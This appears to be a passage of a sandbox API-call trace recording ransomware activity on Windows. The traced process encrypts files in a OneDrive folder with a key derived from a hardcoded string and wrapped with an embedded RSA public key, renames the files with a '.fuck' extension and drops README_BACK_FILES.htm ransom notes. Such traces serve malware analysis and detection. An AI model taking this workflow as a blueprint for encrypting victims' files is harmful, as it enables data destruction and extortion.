[0276.847] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.847] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.847] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.847] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.848] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.848] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.848] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.848] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.848] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.848] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.848] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x250, lpOverlapped=0x0) returned 1 [0276.848] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x250, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x260) returned 1 [0276.848] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x260, lpOverlapped=0x0) returned 1 [0276.848] CloseHandle (hObject=0x5d48) returned 1 [0276.848] CloseHandle (hObject=0x5d3c) returned 1 [0276.849] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ig-ng\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ig-ng\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ig-ng\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ig-ng\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0276.855] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ig-ng\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0276.856] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ig-ng\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ig-ng\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0276.858] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ig-ng\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ig-ng\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ig-ng\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ig-ng\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0276.859] CryptDestroyHash (hHash=0x2fa4c8) returned 1 [0276.859] CryptDestroyKey (hKey=0x2fb308) returned 1 [0276.859] CryptReleaseContext (hProv=0x2f2b730, dwFlags=0x0) returned 1 [0276.859] FindNextFileA (in: hFindFile=0x2fa748, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0276.859] FindClose (in: hFindFile=0x2fa748 | out: hFindFile=0x2fa748) returned 1 [0276.860] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ig-ng\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ig-ng\\readme_back_files.htm")) returned 0xffffffff [0276.860] AreFileApisANSI () returned 1 [0276.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 99 [0276.860] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ig-ng\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ig-ng\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0276.861] GetFileType (hFile=0x5d4c) returned 0x1 [0276.861] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0276.862] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0276.862] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\imageformats\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0276.863] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.863] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.863] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.863] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0276.863] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0276.863] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\imageformats\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\imageformats\\readme_back_files.htm")) returned 0xffffffff [0276.864] AreFileApisANSI () returned 1 [0276.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2df0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 106 [0276.864] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\imageformats\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\imageformats\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0276.865] GetFileType (hFile=0x5d4c) returned 0x1 [0276.865] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0276.867] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0276.867] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0276.869] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.870] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.870] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0276.870] GetLastError () returned 0x0 [0276.870] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\acmDismissIcon.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\acmdismissicon.svg")) returned 0x20 [0276.871] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\acmDismissIcon.svg", dwFileAttributes=0x80) returned 1 [0276.872] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\acmDismissIcon.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\acmdismissicon.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0276.873] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\acmDismissIcon.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\acmdismissicon.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0276.876] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\acmDismissIcon.svg.gsg", dwFileAttributes=0x2) returned 1 [0276.877] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0276.880] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0276.880] lstrlenA (lpString="rSPGydZrXYMOziqdBDWJHbgxzMlQm") returned 29 [0276.880] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb2b0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0276.880] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb488) returned 1 [0276.880] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0276.880] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0276.880] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2a0e0) returned 1 [0276.881] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2a0e0, dwCertEncodingType=0x1, pInfo=0x2f35420*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f35450*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f35458*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb308) returned 1 [0276.881] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0276.881] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2a960*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2a960*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0276.882] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2a960*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2a960*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0276.896] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.906] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.906] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.910] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.910] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.910] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.910] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x1f1, lpOverlapped=0x0) returned 1 [0276.910] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x1f1, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x200) returned 1 [0276.910] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x200, lpOverlapped=0x0) returned 1 [0276.910] CloseHandle (hObject=0x5d3c) returned 1 [0276.910] CloseHandle (hObject=0x5d48) returned 1 [0276.911] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\acmDismissIcon.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\acmdismissicon.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\acmDismissIcon.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\acmdismissicon.svg"), bFailIfExists=0) returned 1 [0276.914] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\acmDismissIcon.svg", dwFileAttributes=0x0) returned 1 [0276.915] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\acmDismissIcon.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\acmdismissicon.svg.gsg")) returned 1 [0276.917] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\acmDismissIcon.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\acmdismissicon.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\acmDismissIcon.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\acmdismissicon.svg.fuck")) returned 1 [0276.918] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0276.918] CryptDestroyKey (hKey=0x2fb488) returned 1 [0276.919] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0276.919] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.919] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0276.919] GetLastError () returned 0x0 [0276.919] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\blurrect.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\blurrect.png")) returned 0x20 [0276.920] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\blurrect.png", dwFileAttributes=0x80) returned 1 [0276.921] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\blurrect.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\blurrect.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0276.922] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\blurrect.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\blurrect.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0276.923] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\blurrect.png.gsg", dwFileAttributes=0x2) returned 1 [0276.923] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0276.927] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0276.927] lstrlenA (lpString="rSPGydZrXYMOziqdBDWJHbgxzMlQm") returned 29 [0276.927] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb508, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0276.927] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb488) returned 1 [0276.927] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0276.927] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0276.927] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2b730) returned 1 [0276.928] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2b730, dwCertEncodingType=0x1, pInfo=0x2f35280*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f352b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f352b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb648) returned 1 [0276.928] CryptEncrypt (in: hKey=0x2fb648, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0276.928] CryptEncrypt (in: hKey=0x2fb648, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2bb70*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2bb70*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0276.929] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2bb70*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2bb70*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0276.930] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x321, lpOverlapped=0x0) returned 1 [0276.940] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x321, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x330) returned 1 [0276.940] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x330, lpOverlapped=0x0) returned 1 [0276.942] CloseHandle (hObject=0x5d48) returned 1 [0276.942] CloseHandle (hObject=0x5d3c) returned 1 [0276.942] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\blurrect.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\blurrect.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\blurrect.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\blurrect.png"), bFailIfExists=0) returned 1 [0276.946] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\blurrect.png", dwFileAttributes=0x0) returned 1 [0276.947] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\blurrect.png.gsg" 